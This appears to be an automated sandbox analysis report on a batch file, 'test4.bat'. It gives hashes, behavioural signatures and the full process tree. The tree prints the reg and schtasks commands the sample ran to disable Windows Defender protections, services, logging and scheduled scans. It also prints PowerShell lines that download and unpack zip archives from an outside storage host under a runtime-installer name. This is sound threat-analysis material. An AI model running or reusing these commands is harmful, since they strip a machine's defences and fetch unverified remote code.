Analysis
-
max time kernel
143s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
14-08-2024 02:59
Static task
static1
Behavioral task
behavioral1
Sample
test4.bat
Resource
win10v2004-20240802-en
General
-
Target
test4.bat
-
Size
8KB
-
MD5
94a014af3a4d1d428029d50d59777a2b
-
SHA1
041aaa9003e6c8b9b978ae4c818359f2282dbcee
-
SHA256
285bcd21d57064b349db7b8a853bbc6d4947a0c627760db5d7803a9f2d71374a
-
SHA512
6cede67cfab078752e9c72b402735d17cb0eabbc02b5a176b819eb7e8560c54a6ee54f59cc39e2ee4566f6d0d74683e733016bd7a60c0efc5c384010f21797c3
-
SSDEEP
96:WjfLtYHXoWaTj++V+m/sewag3XdZSBGn4sn0KYbWLM6Xn9RSWRMcl2z/wwxKlnHr:WTLtYH4fEmEdN40/o5LTsA4
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows Defender Security Center\Notifications reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 33 4852 powershell.exe 35 3076 powershell.exe -
pid Process 4852 powershell.exe 3076 powershell.exe 3540 powershell.exe 1488 powershell.exe -
Modifies Security services 2 TTPs 3 IoCs
Modifies the startup behavior of a security service.
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4852 powershell.exe 4852 powershell.exe 3540 powershell.exe 3540 powershell.exe 3076 powershell.exe 3076 powershell.exe 1488 powershell.exe 1488 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4340 OpenWith.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4852 powershell.exe Token: SeDebugPrivilege 3540 powershell.exe Token: SeDebugPrivilege 3076 powershell.exe Token: SeDebugPrivilege 1488 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4340 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3652 wrote to memory of 3824 3652 cmd.exe 85 PID 3652 wrote to memory of 3824 3652 cmd.exe 85 PID 3824 wrote to memory of 2316 3824 net.exe 86 PID 3824 wrote to memory of 2316 3824 net.exe 86 PID 3652 wrote to memory of 4148 3652 cmd.exe 97 PID 3652 wrote to memory of 4148 3652 cmd.exe 97 PID 3652 wrote to memory of 4408 3652 cmd.exe 98 PID 3652 wrote to memory of 4408 3652 cmd.exe 98 PID 3652 wrote to memory of 2860 3652 cmd.exe 99 PID 3652 wrote to memory of 2860 3652 cmd.exe 99 PID 3652 wrote to memory of 4004 3652 cmd.exe 100 PID 3652 wrote to memory of 4004 3652 cmd.exe 100 PID 3652 wrote to memory of 2832 3652 cmd.exe 101 PID 3652 wrote to memory of 2832 3652 cmd.exe 101 PID 3652 wrote to memory of 2452 3652 cmd.exe 102 PID 3652 wrote to memory of 2452 3652 cmd.exe 102 PID 3652 wrote to memory of 1004 3652 cmd.exe 103 PID 3652 wrote to memory of 1004 3652 cmd.exe 103 PID 3652 wrote to memory of 1488 3652 cmd.exe 104 PID 3652 wrote to memory of 1488 3652 cmd.exe 104 PID 3652 wrote to memory of 4604 3652 cmd.exe 105 PID 3652 wrote to memory of 4604 3652 cmd.exe 105 PID 3652 wrote to memory of 428 3652 cmd.exe 106 PID 3652 wrote to memory of 428 3652 cmd.exe 106 PID 3652 wrote to memory of 2244 3652 cmd.exe 107 PID 3652 wrote to memory of 2244 3652 cmd.exe 107 PID 3652 wrote to memory of 1212 3652 cmd.exe 108 PID 3652 wrote to memory of 1212 3652 cmd.exe 108 PID 3652 wrote to memory of 1848 3652 cmd.exe 109 PID 3652 wrote to memory of 1848 3652 cmd.exe 109 PID 3652 wrote to memory of 4504 3652 cmd.exe 110 PID 3652 wrote to memory of 4504 3652 cmd.exe 110 PID 3652 wrote to memory of 3288 3652 cmd.exe 111 PID 3652 wrote to memory of 3288 3652 cmd.exe 111 PID 3652 wrote to memory of 232 3652 cmd.exe 112 PID 3652 wrote to memory of 232 3652 cmd.exe 112 PID 3652 wrote to memory of 3908 3652 cmd.exe 113 PID 3652 wrote to memory of 3908 3652 cmd.exe 113 PID 3652 wrote to memory of 3620 3652 cmd.exe 114 PID 3652 wrote to memory of 3620 3652 cmd.exe 114 PID 3652 wrote to memory of 4376 3652 cmd.exe 115 PID 3652 wrote to memory of 4376 3652 cmd.exe 115 PID 3652 wrote to memory of 788 3652 cmd.exe 116 PID 3652 wrote to memory of 788 3652 cmd.exe 116 PID 3652 wrote to memory of 512 3652 cmd.exe 117 PID 3652 wrote to memory of 512 3652 cmd.exe 117 PID 3652 wrote to memory of 2032 3652 cmd.exe 118 PID 3652 wrote to memory of 2032 3652 cmd.exe 118 PID 3652 wrote to memory of 4424 3652 cmd.exe 119 PID 3652 wrote to memory of 4424 3652 cmd.exe 119 PID 3652 wrote to memory of 8 3652 cmd.exe 120 PID 3652 wrote to memory of 8 3652 cmd.exe 120 PID 3652 wrote to memory of 960 3652 cmd.exe 121 PID 3652 wrote to memory of 960 3652 cmd.exe 121 PID 3652 wrote to memory of 3996 3652 cmd.exe 122 PID 3652 wrote to memory of 3996 3652 cmd.exe 122 PID 3652 wrote to memory of 4312 3652 cmd.exe 123 PID 3652 wrote to memory of 4312 3652 cmd.exe 123 PID 3652 wrote to memory of 4304 3652 cmd.exe 124 PID 3652 wrote to memory of 4304 3652 cmd.exe 124 PID 3652 wrote to memory of 3764 3652 cmd.exe 125 PID 3652 wrote to memory of 3764 3652 cmd.exe 125 PID 3652 wrote to memory of 860 3652 cmd.exe 126 PID 3652 wrote to memory of 860 3652 cmd.exe 126 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test4.bat"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3652 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:3824 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:2316
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender notification settings
PID:4148
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications " /t REG_DWORD /d "1" /f2⤵PID:4408
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f2⤵PID:2860
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:4004
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d "0" /f2⤵PID:2832
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:2452
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:1004
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableSpecialRunningModes" /t REG_DWORD /d "1" /f2⤵PID:1488
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d "0" /f2⤵PID:4604
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:428
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2244
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1212
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1848
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4504
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3288
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:232
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:3908
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3620
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:4376
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f2⤵PID:788
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:512
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:2032
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:4424
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:8
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:960
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:3996
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:4312
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f2⤵PID:4304
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f2⤵PID:3764
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:860
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1588
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2320
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\MDCoreSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1164
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
PID:4664
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
PID:724
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
PID:3044
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:5100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://firebasestorage.googleapis.com/v0/b/downloads-db3a9.appspot.com/o/Visual-C-Runtimes-All-in-One-May-2024.zip?alt=media&token=0b62930d-1831-40fc-9fd2-5865d81a49e7' -OutFile 'C:\Loader\Runtime\Visual-C-Runtimes-All-in-One-May-2024.zip'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'C:\Loader\Runtime\Visual-C-Runtimes-All-in-One-May-2024.zip' -DestinationPath 'C:\Loader\Runtime\Visual-C-Runtimes-All-in-One-May-2024' -Force"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://firebasestorage.googleapis.com/v0/b/downloads-db3a9.appspot.com/o/Visual-C-Runtimes-All-in-One-July-2024.zip?alt=media&token=6e550e5d-2797-40d2-b7d6-fd62e8dd4b77' -OutFile 'C:\Loader\Runtime\Visual-C-Runtimes-All-in-One-July-2024.zip'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'C:\Loader\Runtime\Visual-C-Runtimes-All-in-One-July-2024.zip' -DestinationPath 'C:\Loader\Runtime\Visual-C-Runtimes-All-in-One-July-2024' -Force"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4340
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5f54739f39b26bcb477df3cc1d938c8de
SHA1ce32f9dd56d756b9026ac33fe104b975118cb70f
SHA2568ad9052ea2d364855cbf3731f4b5267c633205d2903289e18a21787b57b51312
SHA51235e61cc96c228346a2b586970a55f8b686c7fe99eef86bcc63f00ccd38318a750bc6dd79d56d9daa79746ac67fc6153d57c1b4feb8c002fefe8dbd5a0fe57968
-
Filesize
1KB
MD58b618485945e8cc39968a90af76ca8fd
SHA1f1f7432cef86e8e20a366469968c9c15a44403e5
SHA256665c03379802d60a03567e8004f4d7a98312c000c1babb6bccd4261370645104
SHA51238e70a2f09d430528271f6e067d19e519d428892e693c314d397719718c3dd933a6822c0c591657a31f23605d4674b0ed118109718a6f60ffa8834ebfbf3827c
-
Filesize
1KB
MD58c1ed73bbff48c8f07fb86d7b6b72268
SHA158ca6b8296e1fb2b875f779ed67af3d9eaae5911
SHA256332be7c35b03dac2131d94e897d54d263692d08fdb74d380447d3e1fe2d31af0
SHA512c0580aac8fe3eb45116fdf89ba05f537b664e1671cbfc5f55c307cba5c2505abc69033038cdc69be8caa9b732dc1739690a1210bc3f1fdefd84ba64e3e736ad8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82